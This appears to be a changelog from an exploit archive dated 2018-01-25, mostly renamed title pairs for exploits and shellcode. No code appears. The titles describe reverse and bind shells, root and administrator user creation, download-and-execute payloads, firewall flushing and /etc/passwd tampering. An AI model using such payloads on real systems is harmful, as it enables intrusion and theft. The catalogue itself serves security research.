DB: 2018-01-25

124 changes to exploits/shellcodes

Airsensor M520 - HTTPD Unauthenticated Remote Denial of Service / Buffer Overflow (PoC)
Airsensor M520 - HTTPd Unauthenticated Remote Denial of Service / Buffer Overflow (PoC)

Samsung DVR SHR2040 - HTTPD Remote Denial of Service Denial of Service (PoC)
Samsung DVR SHR2040 - HTTPd Remote Denial of Service Denial of Service (PoC)

Novell ZenWorks 10/11 - TFTPD Remote Code Execution
Novell ZENworks 10/11 - TFTPD Remote Code Execution

Apache 1.1 / NCSA httpd 1.5.2 / Netscape Server 1.12/1.1/2.0 - a nph-test-cgi
Apache 1.1 / NCSA HTTPd 1.5.2 / Netscape Server 1.12/1.1/2.0 - a nph-test-cgi

WhitSoft SlimServe HTTPd 1.1 - Get Denial of Service
WhitSoft SlimServe HTTPd 1.1 - 'GET_ Denial of Service

GoAhead Software GoAhead WebServer (Windows) 2.1 - Denial of Service
GoAhead Web Server 2.1 (Windows) - Denial of Service

Anti-Web HTTPD 2.2 Script - Engine File Opening Denial of Service
Anti-Web HTTPd 2.2 Script - Engine File Opening Denial of Service

Rosiello Security Sphiro HTTPD 0.1B - Remote Heap Buffer Overflow
Rosiello Security Sphiro HTTPd 0.1B - Remote Heap Buffer Overflow

D-Link DWL-G700AP 2.00/2.01 - HTTPD Denial of Service
D-Link DWL-G700AP 2.00/2.01 - HTTPd Denial of Service

Lorex LH300 Series - ActiveX Buffer Overflow (PoC)

Debut Embedded httpd 1.20 - Denial of Service
Debut Embedded HTTPd 1.20 - Denial of Service

Xorg 1.4 < 1.11.2 - File Permission Change
X.Org xorg 1.4 < 1.11.2 - File Permission Change

Sync Breeze Enterprise 9.5.16 - Import Command Buffer Overflow (Metasploit)
Sync Breeze Enterprise 9.5.16 - 'Import Command' Buffer Overflow (Metasploit)

ICU library 52 < 54 - Multiple Vulnerabilities

rooter VDSL Device - Goahead WebServer Disclosure
FS4104-AW VDSL Device (Rooter) - GoAhead WebServer Disclosure

Ruby 1.8.6/1.9 (WEBick Httpd 1.3.1) - Directory Traversal
Ruby 1.8.6/1.9 (WEBick HTTPd 1.3.1) - Directory Traversal

Simple HTTPd 1.42 - PUT Request Remote Buffer Overflow
Simple HTTPd 1.42 - 'PUT' Remote Buffer Overflow

Debian 2.1 - httpd
Debian 2.1 - HTTPd

Apache 0.8.x/1.0.x / NCSA httpd 1.x - test-cgi Directory Listing
Apache 0.8.x/1.0.x / NCSA HTTPd 1.x - 'test-cgi' Directory Listing

Inso DynaWeb httpd 3.1/4.0.2/4.1 - Format String
Inso DynaWeb HTTPd 3.1/4.0.2/4.1 - Format String

W3C CERN httpd 3.0 Proxy - Cross-Site Scripting
W3C CERN HTTPd 3.0 Proxy - Cross-Site Scripting

ATP httpd 0.4 - Single Byte Buffer Overflow
ATP HTTPd 0.4 - Single Byte Buffer Overflow

AN HTTPD 1.38/1.39/1.40/1.41 - SOCKS4 Request Buffer Overflow
AN HTTPD 1.38/1.39/1.40/1.41 - 'SOCKS4' Buffer Overflow
Light HTTPd 0.1 - GET Buffer Overflow (1)
Light HTTPd 0.1 - GET Buffer Overflow (2)
Light HTTPd 0.1 - 'GET' Buffer Overflow (1)
Light HTTPd 0.1 - 'GET' Buffer Overflow (2)

Light HTTPD 0.1 (Windows) - Remote Buffer Overflow
Light HTTPd 0.1 (Windows) - Remote Buffer Overflow

Ultra Mini HTTPD 1.21 - Remote Stack Buffer Overflow
Ultra Mini HTTPd 1.21 - Remote Stack Buffer Overflow

Ultra Mini HTTPD - Remote Stack Buffer Overflow (Metasploit)
Ultra Mini HTTPd - Remote Stack Buffer Overflow (Metasploit)

BusyBox 1.01 - HTTPD Directory Traversal
BusyBox 1.01 - HTTPd Directory Traversal

Ultra Mini HTTPD 1.21 - 'POST' Remote Stack Buffer Overflow (1)
Ultra Mini HTTPd 1.21 - 'POST' Remote Stack Buffer Overflow (1)

Ultra Mini HTTPD 1.21 - 'POST' Remote Stack Buffer Overflow (2)
Ultra Mini HTTPd 1.21 - 'POST' Remote Stack Buffer Overflow (2)
Postfix SMTP 4.2.x < 4.2.48 - 'Shellshock'  Remote Command Injection
Apache mod_cgi - 'Shellshock'  Remote Command Injection
Postfix SMTP 4.2.x < 4.2.48 - 'Shellshock' Remote Command Injection
Apache mod_cgi - 'Shellshock' Remote Command Injection

IPFire - 'Shellshock'  Bash Environment Variable Command Injection (Metasploit)
IPFire - 'Shellshock' Bash Environment Variable Command Injection (Metasploit)

AsusWRT Router < 3.0.0.4.380.7743 - Unauthenticated LAN Remote Code Execution

GoAhead Web Server - 'LD_PRELOAD' Arbitrary Module Load (Metasploit)
GoAhead Web Server 2.5 < 3.6.5 - HTTPd 'LD_PRELOAD' Arbitrary Module Load (Metasploit)

GoAhead httpd 2.5 < 3.6.5 - 'LD_PRELOAD' Remote Code Execution
GoAhead Web Server 2.5 < 3.6.5 - HTTPd 'LD_PRELOAD' Remote Code Execution

NETGEAR WNR2000v5 - Unauthenticated 'hidden_lang_avi' Remote Stack Overflow (Metasploit)

Getsimple 2.01 - Local File Inclusion
Getsimple CMS 2.01 - Local File Inclusion

Novell Zenworks Mobile Device Managment 2.6.1/2.7.0 - Local File Inclusion (Metasploit)
Novell ZENworks Mobile Device Managment 2.6.1/2.7.0 - Local File Inclusion (Metasploit)

ManageEngine DesktopCentral 8.0.0 build < 80293 - Arbitrary File Upload
ManageEngine Desktop Central 8.0.0 build < 80293 - Arbitrary File Upload
ManageEngine DesktopCentral - Arbitrary File Upload / Remote Code Execution
ManageEngine EventLog Analyzer - Multiple Vulnerabilities
ManageEngine Desktop Central - Arbitrary File Upload / Remote Code Execution
ManageEngine EventLog Analyzer - Multiple Vulnerabilities (1)

Bash CGI - 'Shellshock' Remote Command Injection  (Metasploit)
Bash CGI - 'Shellshock' Remote Command Injection (Metasploit)

Getsimple 3.0 - 'set' Local File Inclusion
Getsimple CMS 3.0 - 'set' Local File Inclusion

ZENworks Configuration Management 11.3.1 - Remote Code Execution
Novell ZENworks Configuration Management 11.3.1 - Remote Code Execution

Kaseya Virtual System Administrator - Multiple Vulnerabilities (1)
Kaseya Virtual System Administrator (VSA) - Multiple Vulnerabilities (1)

Getsimple - 'path' Local File Inclusion
Getsimple CMS 3.1.2 - 'path' Local File Inclusion

Sysaid Helpdesk Software 14.4.32 b25 - SQL Injection (Metasploit)
SysAid Help Desk Software 14.4.32 b25 - SQL Injection (Metasploit)

ManageEngine Password Manager Pro and ManageEngine IT360 - SQL Injection
ManageEngine Password Manager Pro / ManageEngine IT360 - SQL Injection
BMC Track-It! 11.4 - Multiple Vulnerabilities
Billion / TrueOnline / ZyXEL Routers - Multiple Vulnerabilities
SysAid Help Desk 14.4 - Multiple Vulnerabilities
Pimcore CMS 1.4.9 <2.1.0 - Multiple Vulnerabilities
GetSimple CMS 3.3.1 - Cross-Site Scripting
CMS Made Simple 1.11.9 - Multiple Vulnerabilities
ManageEngine Desktop Central - Create Administrator
ManageEngine EventLog Analyzer - Multiple Vulnerabilities (2)
ManageEngine OpManager / Applications Manager / IT360 - 'FailOverServlet' Multiple Vulnerabilities
ManageEngine Netflow Analyzer / IT360 - Arbitrary File Download
ManageEngine OpManager / Social IT Plus / IT360 - Multiple Vulnerabilities

Kaseya Virtual System Administrator (VSA) 7.0 < 9.1 - Authenticated Arbitrary File Upload

Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)
FreeBSD/x86-64 - exec /bin/sh Shellcode (31 bytes)
FreeBSD/x86-64 - execve(/bin/sh) Shellcode (34 bytes)
FreeBSD/x64 - exec /bin/sh Shellcode (31 bytes)
FreeBSD/x64 - execve(/bin/sh) Shellcode (34 bytes)
Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (84 bytes)
Linux/x86-64 - Reverse TCP Shell (/bin/bash) + Semi-Stealth Shellcode (88+ bytes) (Generator)
Linux/x64 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (84 bytes)
Linux/x64 - Reverse TCP Shell (/bin/bash) + Semi-Stealth Shellcode (88+ bytes) (Generator)

Linux/x86-64 - setuid(0) + execve(/bin/sh) Shellcode (49 bytes)
Linux/x64 - setuid(0) + execve(/bin/sh) Shellcode (49 bytes)

Linux/x86 - execve(/bin/sh) + Alphanumeric Shellcode (392 bytes)
Linux/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (132 bytes)
Linux/x86-64 - execve(/bin/sh) Shellcode (33 bytes)
Linux/x64 - Bind TCP (4444/TCP) Shell Shellcode (132 bytes)
Linux/x64 - execve(/bin/sh) Shellcode (33 bytes)

NetBSD/x86 - execve(/bin/sh) Shellcode (68 bytes)

Solaris/SPARC - execve(/bin/sh) Shellcode (52 bytes)

Solaris/SPARC - Bind TCP Shell Shellcode (240 bytes)
Solaris/x86 - execve(/bin/sh) ToUpper Encoded Shellcode (84 bytes)
Solaris/x86 - inetd Add Service + execve() Shellcode (201 bytes)
UnixWare - execve(/bin/sh) Shellcode (95 bytes)
Solaris/x86 - execve(/bin/sh) ToUpper Encoded Shellcode (84 bytes)
Solaris/x86 - inetd Add Service + execve() Shellcode (201 bytes)
UnixWare - execve(/bin/sh) Shellcode (95 bytes)

Windows/x86 - Reverse TCP + Download A File + Save + Execute Shellcode
Windows/x86 - Reverse TCP + Download File + Save + Execute Shellcode

Windows/x86-64 - (URLDownloadToFileA) Download File (http://localhost/trojan.exe) + Execute Shellcode (218+ bytes)
Windows/x64 - URLDownloadToFileA(http://localhost/trojan.exe) + Execute Shellcode (218+ bytes)

Windows/x86 (XP SP3) - ShellExecuteA Shellcode
Windows/x86 (XP SP3) - ShellExecuteA() Shellcode

Linux/x86 - Fork Bomb Shellcode (6 bytes) (1)
Windows  (XP Professional SP2) (English) - Wordpad.exe + Null-Free Shellcode (12 bytes)
Linux/x86 - Eject /dev/cdrom Shellcode (42 bytes)
Windows (XP Professional SP2) (English) - Wordpad.exe + Null-Free Shellcode (12 bytes)
Linux/x86 - Eject /dev/cdrom Shellcode (42 bytes)
Linux/x86 - ip6tables -F + Polymorphic Shellcode (71 bytes)
Linux/x86 - ip6tables -F Shellcode (47 bytes)
Linux/i686 - pacman -S <package> (default package: backdoor) Shellcode (64 bytes)
Linux/i686 - pacman -R <package> Shellcode (59 bytes)
Linux/x86 - ip6tables -F + Polymorphic Shellcode (71 bytes)
Linux/x86 - ip6tables -F Shellcode (47 bytes)
Linux/i686 - pacman -S <package> (default package: backdoor) Shellcode (64 bytes)
Linux/i686 - pacman -R <package> Shellcode (59 bytes)

Windows/x86 - JITed Stage-0 Shellcode

Windows/x86 (XP SP2) - WinExec (write.exe) + ExitProcess Shellcode (16 bytes)
Windows/x86 (XP SP2) - WinExec(write.exe) + ExitProcess Shellcode (16 bytes)
Windows/x86 - MessageBox Shellcode (Metasploit)
Windows (XP/Vista/7) - Egghunter (0x07333531) JITed Stage-0 Adjusted Universal Shellcode
Windows/x86 - MessageBox Shellcode (Generator) (Metasploit)
Windows (XP/Vista/7) - Egghunter (0x07333531) JITed Stage-0 Adjusted Universal Shellcode
Linux/x86-64 - reboot(POWER_OFF) Shellcode (19 bytes)
Linux/x86-64 - execve(/bin/sh) Shellcode (30 bytes)
Linux/x64 - reboot(POWER_OFF) Shellcode (19 bytes)
Linux/x64 - execve(/bin/sh) Shellcode (30 bytes)

Linux/x86 - execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) Shellcode (45 bytes)

Windows/x86-64 (7 Professional SP1) (French) - Beep Shellcode (39 bytes)
Windows/x64 (7 Professional SP1) (French) - Beep Shellcode (39 bytes)
Linux/x86 - chmod 0777 /etc/passwd + sys_chmod syscall Shellcode (39 bytes)
Linux/x86 - execve(_/bin/sh__ _-c__ _reboot_) Shellcode (45 bytes)
Linux/x86 - chmod 0777 /etc/passwd + sys_chmod syscall Shellcode (39 bytes)
Linux/x86 - execve(_/bin/sh__ _-c__ _reboot_) Shellcode (45 bytes)

Windows/x86-64 (7) - cmd.exe Shellcode (61 bytes)
Windows/x64 (7) - cmd.exe Shellcode (61 bytes)

Windows - MessageBoxA Shellcode (238 bytes)
Windows - MessageBoxA() Shellcode (238 bytes)

Linux/x86-64 - Disable ASLR Security Shellcode (143 bytes)
Linux/x64 - Disable ASLR Security Shellcode (143 bytes)
Linux/x86-64 - setuid(0) + chmod 0777 /etc/passwd + exit(0) Shellcode (63 bytes)
Linux/x86-64 - Add Root User (shell-storm/leet) To /etc/{passwd_shadow} Shellcode (390 bytes)
Windows (XP SP3) (Spanish) - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes) (Generator)
Linux/ARM - setuid(0) + kill(-1_ SIGKILL) Shellcode (28 bytes)
Windows - WinExec (cmd.exe) + ExitProcess Shellcode (195 bytes)
Linux/x64 - setuid(0) + chmod 0777 /etc/passwd + exit(0) Shellcode (63 bytes)
Linux/x64 - Add Root User (shell-storm/leet) To /etc/{passwd_shadow} Shellcode (390 bytes)
Windows (XP SP3) (Spanish) - URLDownloadToFileA() + CreateProcessA() + ExitProcess() Shellcode (176+ bytes) (Generator)
Linux/ARM - setuid(0) + kill(-1_ SIGKILL) Shellcode (28 bytes)
Windows - WinExec(cmd.exe) + ExitProcess Shellcode (195 bytes)

Linux/ARM - chmod 0777 /etc/shadow Shellcode (35 bytes)

Linux/x86-64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (49 bytes)
Linux/x64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (49 bytes)

Windows (XP SP3) (English) - MessageBoxA Shellcode (87 bytes)
Windows (XP SP3) (English) - MessageBoxA() Shellcode (87 bytes)
OSX/x86-64 - setuid() + Shell(/bin/sh) Shellcode (51 bytes)
ARM - Add Root User Shellcode (Metasploit) (66+ bytes) (Generator)
OSX/x64 - setuid() + Shell(/bin/sh) Shellcode (51 bytes)
ARM - Add Root User Shellcode (66+ bytes) (Generator) (Metasploit)

Windows/x86 - Eggsearch Shellcode (33 bytes)
Linux/x86 - Bind TCP (6666/TCP) Netcat (/usr/bin/netcat) Shell (/bin/sh) + Polymorphic + XOR Encoded Shellcode (69/93 bytes)
OSX/x86-64 - Reverse TCP (FFFFFFFF:4444/TCP) Shell (/bin/sh) Shellcode (131 bytes)
Linux/x86 - Bind TCP (6666/TCP) Netcat (/usr/bin/netcat) Shell (/bin/sh) + Polymorphic + XOR Encoded Shellcode (69/93 bytes)
OSX/x64 - Reverse TCP (FFFFFFFF:4444/TCP) Shell (/bin/sh) Shellcode (131 bytes)

Windows/x86 (PerfectXp-pc1/SP3 ) (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes)

OSX/x86-64 - Universal ROP + Reverse TCP Shell Shellcode
OSX/x64 - Universal ROP + Reverse TCP Shell Shellcode

Linux/x86-64 - execve(/bin/sh) Shellcode (52 bytes)
Linux/x64 - execve(/bin/sh) Shellcode (52 bytes)

Linux/x86-64 - Add Root User (t0r/Winner) To /etc/passwd Shellcode (189 bytes)
Linux/x64 - Add Root User (t0r/Winner) To /etc/passwd Shellcode (189 bytes)

Windows/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (508 bytes)
Windows/x64 - Bind TCP (4444/TCP) Shell Shellcode (508 bytes)

Windows/x86-64 / x86 (2000/XP/7) - URLDownloadToFile (http://bflow.security-portal.cz/down/xy.txt) + WinExec() + ExitProcess Shellcode
Windows (2000/XP/7) - URLDownloadToFile(http://bflow.security-portal.cz/down/xy.txt) + WinExec() + ExitProcess Shellcode

Windows - Add Administrator User (BroK3n/BroK3n) + Null-Free Shellcode (194 bytes)

Linux/x86-64 - Reverse TCP (127.1.1.1:6969/TCP) Shell (/bin/bash) Shellcode (139 bytes)
Linux/x64 - Reverse TCP (127.1.1.1:6969/TCP) Shell (/bin/bash) Shellcode (139 bytes)
Linux/x86-64 - execve(_/bin/sh\0__NULL_NULL) + Position Independent + Alphanumeric Shellcode (87 bytes)
Linux/x86 - rmdir() Shellcode (37 bytes)
Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free Shellcode (81/96 bytes)
Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free + Null-Mask Shellcode (77-85/90-98 bytes)
Linux/x64 - execve(_/bin/sh\0__NULL_NULL) + Position Independent + Alphanumeric Shellcode (87 bytes)
Linux/x86 - rmdir() Shellcode (37 bytes)
Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free Shellcode (81/96 bytes)
Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free + Null-Mask Shellcode (77-85/90-98 bytes)

Windows/x86-64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + Stop Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes)
Windows/x64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + Stop Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes)

Windows/x86-64 (XP) - Download File + Execute Shellcode Using Powershell (Generator)
Windows/x64 (XP) - Download File + Execute Shellcode Using Powershell (Generator)

Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (118 bytes)
Linux/x64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (118 bytes)

Linux/x86-64 - execve(/bin/sh) Via Push Shellcode (23 bytes)
Linux/x64 - execve(/bin/sh) Via Push Shellcode (23 bytes)

Linux/x86-64 - execve(/bin/sh) + Null-Free Shellcode (30 bytes)
Linux/x64 - execve(/bin/sh) + Null-Free Shellcode (30 bytes)
Linux/x86-64 - execve() Encoded Shellcode (57 bytes)
Linux/x86 - execve(/bin/sh) + ROT7 Encoded Shellcode
Linux/x64 - execve() Encoded Shellcode (57 bytes)
Linux/x86 - execve(/bin/sh) + ROT7 Encoded Shellcode (Generator)
Windows/x86 - user32!MessageBox _Hello World!_ + Null-Free Shellcode (199 bytes)
Linux/x86 - execve(/bin/sh) + ROL/ROR Encoded Shellcode
Windows/x86-64 (2003) - Token Stealing Shellcode (59 bytes)
OSX/x86-64 - execve(/bin/sh) + Null-Free Shellcode (34 bytes)
Windows/x86 - user32!MessageBox(Hello World!) + Null-Free Shellcode (199 bytes)
Linux/x86 - execve(/bin/sh) + ROL/ROR Encoded Shellcode (Generator)
Windows/x64 (2003) - Token Stealing Shellcode (59 bytes)
OSX/x64 - execve(/bin/sh) + Null-Free Shellcode (34 bytes)
OSX/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (144 bytes)
Linux/x86-64 - execve(/bin/sh) Shellcode (34 bytes)
OSX/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (144 bytes)
Linux/x64 - execve(/bin/sh) Shellcode (34 bytes)
Linux/x86-64 - execve() Shellcode (22 bytes)
Linux/x86-64 - Bind TCP (31173/TCP) Shell (/bin/sh) + Password (1234) Shellcode (92 bytes)
Linux/x86-64 - Egghunter (0x6b634068) Shellcode (24 bytes)
Linux/x86-64 - execve() + Polymorphic Shellcode (31 bytes)
Windows (XP < 10) - Command Generator WinExec + Null-Free Shellcode (Generator)
Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes)
Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (162 bytes)
Linux/x64 - execve() Shellcode (22 bytes)
Linux/x64 - Bind TCP (31173/TCP) Shell (/bin/sh) + Password (1234) Shellcode (92 bytes)
Linux/x64 - Egghunter (0x6b634068) Shellcode (24 bytes)
Linux/x64 - execve() + Polymorphic Shellcode (31 bytes)
Windows (XP < 10) - Command Generator WinExec() + Null-Free Shellcode (Generator)
Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes)
Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (162 bytes)
Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (151 bytes)
Linux/x86-64 - Egghunter (0x50905090) Shellcode (18 bytes)
Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (151 bytes)
Linux/x64 - Egghunter (0x50905090) Shellcode (18 bytes)
Linux/x86-64 - execve() + XOR/NOT/DIV Encoded Shellcode (54 bytes)
Linux x86/x86-64 - Reverse TCP (192.168.1.29:4444/TCP) Shell Shellcode (195 bytes)
Linux x86/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (251 bytes)
Linux x86/x86-64 - Read /etc/passwd Shellcode (156 bytes)
Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Polymorphic Shellcode (122 bytes)
Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Password (hack) + Polymorphic Shellcode (135 bytes)
Linux/x64 - execve() + XOR/NOT/DIV Encoded Shellcode (54 bytes)
Linux x86/x64 - Reverse TCP (192.168.1.29:4444/TCP) Shell Shellcode (195 bytes)
Linux x86/x64 - Bind TCP (4444/TCP) Shell Shellcode (251 bytes)
Linux x86/x64 - Read /etc/passwd Shellcode (156 bytes)
Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Polymorphic Shellcode (122 bytes)
Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Password (hack) + Polymorphic Shellcode (135 bytes)

Linux/x86-64 - execve() Stack + Polymorphic Shellcode (47 bytes)
Linux/x64 - execve() Stack + Polymorphic Shellcode (47 bytes)
Linux/x86-64 - Reverse TCP (192.168.1.2:1234/TCP) Shell Shellcode (134 bytes)
Linux/x86-64 - execve(/bin/sh) Shellcode (26 bytes)
Linux/x86-64 - execve(/bin/sh) Shellcode (25 bytes) (1)
Linux/x86-64 - execve(/bin/bash) Shellcode (33 bytes)
Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (81 bytes)
Linux/x86-64 - Read /etc/passwd Shellcode (65 bytes)
Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (86 bytes)
Windows/x86 - URLDownloadToFileA() (http://192.168.86.130/sample.exe) + SetFileAttributesA() (pyld.exe) + WinExec() + ExitProcess() Shellcode (394 bytes)
Linux/x64 - Reverse TCP (192.168.1.2:1234/TCP) Shell Shellcode (134 bytes)
Linux/x64 - execve(/bin/sh) Shellcode (26 bytes)
Linux/x64 - execve(/bin/sh) Shellcode (25 bytes) (1)
Linux/x64 - execve(/bin/bash) Shellcode (33 bytes)
Linux/x64 - Bind TCP (5600/TCP) Shell Shellcode (81 bytes)
Linux/x64 - Read /etc/passwd Shellcode (65 bytes)
Linux/x64 - Bind TCP (5600/TCP) Shell Shellcode (86 bytes)
Windows/x86 - URLDownloadToFileA(http://192.168.86.130/sample.exe) + SetFileAttributesA(pyld.exe) + WinExec() + ExitProcess() Shellcode (394 bytes)

Linux/x86-64 - Bind TCP Shell Shellcode (Generator)
Linux/x64 - Bind TCP Shell Shellcode (Generator)
Linux/x86-64 - Bind TCP (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (199 bytes)
Linux/x86-64 - Reverse TCP (192.168.209.131:1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (203 bytes)
Linux/x64 - Bind TCP (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (199 bytes)
Linux/x64 - Reverse TCP (192.168.209.131:1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (203 bytes)

Linux/x86-64 - Download File (http://192.168.30.129/pri.sh) + Execute Used To Steal Information Shellcode (399 bytes)
Linux/x64 - Download File (http://192.168.30.129/pri.sh) + Execute Used To Steal Information Shellcode (399 bytes)
Linux/x86-64 - execve() + XOR Encoded Shellcode (84 bytes)
BSD / Linux / Windows/x86-64/x86 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)
Linux/x64 - execve() + XOR Encoded Shellcode (84 bytes)
BSD / Linux / Windows - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)
Linux/x86-64 - Reverse TCP (192.168.86.128:1472/TCP) cat /etc/passwd Shellcode (164 bytes)
Linux/x86-64 - Bind TCP Netcat Shell + Null-Free Shellcode (64 bytes)
Linux/x64 - Reverse TCP (192.168.86.128:1472/TCP) cat /etc/passwd Shellcode (164 bytes)
Linux/x64 - Bind TCP Netcat Shell + Null-Free Shellcode (64 bytes)

Linux/x86-64 - Bind TCP (4442/TCP) Ncat Shell + SSL + Multi-Channel (4444-4447/TCP) + Persistant + fork() + IPv4/6 + Password + Null-Free Shellcode (176 bytes)
Linux/x64 - Bind TCP (4442/TCP) Ncat Shell + SSL + Multi-Channel (4444-4447/TCP) + Persistant + fork() + IPv4/6 + Password + Null-Free Shellcode (176 bytes)

Linux/x86-64 - Reverse TCP (10.1.1.4/TCP) Shell + Continuously Probing via Socket + Port-Range (391-399) + Password (la crips) + Null-Free Shellcode (172 bytes)
Linux/x64 - Reverse TCP (10.1.1.4/TCP) Shell + Continuously Probing via Socket + Port-Range (391-399) + Password (la crips) + Null-Free Shellcode (172 bytes)

Linux/x86-64 - Bind TCP (4442/TCP) Shell + Syscall Persistent + Multi-Terminal/Port-Range (4444-4447/TCP) + Password (la crips) + Daemon Shellcode (83/148/177 bytes)
Linux/x64 - Bind TCP (4442/TCP) Shell + Syscall Persistent + Multi-Terminal/Port-Range (4444-4447/TCP) + Password (la crips) + Daemon Shellcode (83/148/177 bytes)

Linux/x86-64 - Reverse TCP (10.1.1.4:46357/TCP) Shell + Subtle Probing + Timer + Burst + Password (la crips) + Multi-Terminal Shellcode (84/122/172 bytes)
Linux/x64 - Reverse TCP (10.1.1.4:46357/TCP) Shell + Subtle Probing + Timer + Burst + Password (la crips) + Multi-Terminal Shellcode (84/122/172 bytes)

Windows/x86 - MessageBoxA Shellcode (242 bytes)
Windows/x86 - MessageBoxA() Shellcode (242 bytes)
Linux/x86-64 - Bind TCP (4444/TCP) + Stager + Egghunter (0x64616564) Shellcode (157 bytes)
Linux/x86-64 - Add User (pwned/$pass$) Using open_write_close To /etc/{passwd_shadow} Shellcode (358 bytes)
Linux/x86-64 - Add User (pwned/$pass$) Using echo cmd To /etc/{passwd_shadow} Shellcode (273 bytes)
Linux/x86-64 - Read /etc/passwd Shellcode (82 bytes)
Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Password) Shellcode (173 bytes)
Linux/x86-64 - Reverse TCP (192.168.1.9:4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (138 bytes)
Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (175 bytes)
Linux/x86-64 - Bind TCP (Random TCP Port) Shell + Null-Free Shellcode (57 bytes)
Linux/x86-64 - Bind TCP (31337/TCP) Shell Shellcode (150 bytes)
Linux/x86-64 - Reverse TCP (192.168.1.10:31337/TCP) Shell Shellcode (118 bytes)
Linux/x86-64 - Bind TCP (1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (131 bytes)
Linux/x86-64 - Reverse TCP (127.0.0.1:1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (109 bytes)
Linux/x86-64 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (85 bytes)
Linux/x86-64 - setreuid(0_0) + execve(/bin/csh_ [/bin/csh_ NULL]) + XOR Encoded Shellcode (87 bytes)
Linux/x86-64 - setreuid(0_0) + execve(/bin/ksh_ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (87 bytes)
Linux/x86-64 - setreuid(0_0) + execve(/bin/zsh_ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (87 bytes)
Linux/x86-64 - sethostname(Rooted !) + killall Shellcode (33 bytes)
Linux/x64 - Bind TCP (4444/TCP) + Stager + Egghunter (0x64616564) Shellcode (157 bytes)
Linux/x64 - Add User (pwned/$pass$) Using open_write_close To /etc/{passwd_shadow} Shellcode (358 bytes)
Linux/x64 - Add User (pwned/$pass$) Using echo cmd To /etc/{passwd_shadow} Shellcode (273 bytes)
Linux/x64 - Read /etc/passwd Shellcode (82 bytes)
Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Password) Shellcode (173 bytes)
Linux/x64 - Reverse TCP (192.168.1.9:4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (138 bytes)
Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (175 bytes)
Linux/x64 - Bind TCP (Random TCP Port) Shell + Null-Free Shellcode (57 bytes)
Linux/x64 - Bind TCP (31337/TCP) Shell Shellcode (150 bytes)
Linux/x64 - Reverse TCP (192.168.1.10:31337/TCP) Shell Shellcode (118 bytes)
Linux/x64 - Bind TCP (1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (131 bytes)
Linux/x64 - Reverse TCP (127.0.0.1:1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (109 bytes)
Linux/x64 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (85 bytes)
Linux/x64 - setreuid(0_0) + execve(/bin/csh_ [/bin/csh_ NULL]) + XOR Encoded Shellcode (87 bytes)
